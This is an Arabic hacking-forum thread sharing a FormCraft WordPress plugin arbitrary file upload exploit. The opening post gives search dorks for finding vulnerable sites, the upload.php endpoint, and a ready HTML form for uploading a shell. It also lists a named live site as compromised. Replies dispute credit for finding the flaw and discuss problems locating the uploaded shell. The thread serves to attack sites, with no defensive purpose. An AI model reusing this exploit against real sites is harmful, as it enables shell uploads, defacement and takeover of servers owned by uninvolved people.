Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

M1rx موقوف
  • شكراً: 66
  • تم شكره 52 مرة في 10 مشاركة

السلام عليكم ورحمة الله وبركاتة

WordPress Plugin FormCraft Arbitrary File Upload Vulnerability

Dork:

كود:
"powered by formcraft"
inurl:plugins/formcraft
exploit :
كود:
http:// [SITE] /wp-content/plugins/formcraft/file-upload/server/content/upload.php
كود بلغة HTML:
<!--
Formcraft Arbitrary File Upload
By AMir dZ 52
WwW.Sec4Ever.CoM
!-->
<form method="POST" action="



http://[TARGET]/wp-content/plugins/formcraft/file-upload/server/content/upload.php



" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>upload file</button>

</form>
مسار الشل:


مواقع مصابة:
كود:
http://wxsolution.com//wp-content//plugins//formcraft//file-upload//server//content/upload.php

من فظلكم متحلبوش هادوك تع اندونيسيا ...
كون تحلبوهم يغزوون كل المواقع

21 أعضاء قالوا شكراً لـ M1rx على المشاركة المفيدة:
mehdi17240 عضو مميز
  • شكراً: 3
  • تم شكره 36 مرة في 26 مشاركة

M1rx موقوف
  • شكراً: 66
  • تم شكره 52 مرة في 10 مشاركة

المشاركة الأصلية كتبت بواسطة mehdi17240 اقتباس :
والله انا لا اعلم انها موجودة من قبل
انا حملت السكربت و فحصته و وجدت تغرة upload
فنشرتها
+
انا اكتشفت هذه الثغرة منذ اسبوعين والله

الأعضاء الذين قالوا شكراً لـ M1rx على المشاركة المفيدة:
mehdi17240 عضو مميز
  • شكراً: 3
  • تم شكره 36 مرة في 26 مشاركة

المشاركة الأصلية كتبت بواسطة amir dz 52 اقتباس :
والله انا لا اعلم انها موجودة من قبل
انا حملت السكربت و فحصته و وجدت تغرة upload
فنشرتها
+
انا اكتشفت هذه الثغرة منذ اسبوعين والله
اخي الفاضل وانا لم اضع الفيديو الا لتوضيح الثغرة فقط
واصل اخي وربنا يوفقك

الأعضاء الذين قالوا شكراً لـ mehdi17240 على المشاركة المفيدة:
Mr_AnarShi-T عضو مميز
  • شكراً: 246
  • تم شكره 718 مرة في 170 مشاركة

ثغرة حلوة إستغلال علي الطاير

توقيع
Perl & Java Lov3r

No perl No life
3 أعضاء قالوا شكراً لـ Mr_AnarShi-T على المشاركة المفيدة:
ALgR_Dz 47 عضو جديد
  • شكراً: 18
  • تم شكره 9 مرة في 7 مشاركة

مشكل في مسار شيل بعد رفعه

توقيع
[#] اللهم إني أسألك علماً نافعاً ، ورزقاً طيباً ، وعملاً متقبلاً[#]
قال رسول الله صلى الله عليه وسلم** لاخير في كاتم علم **

@ ALgR_Dz 47 @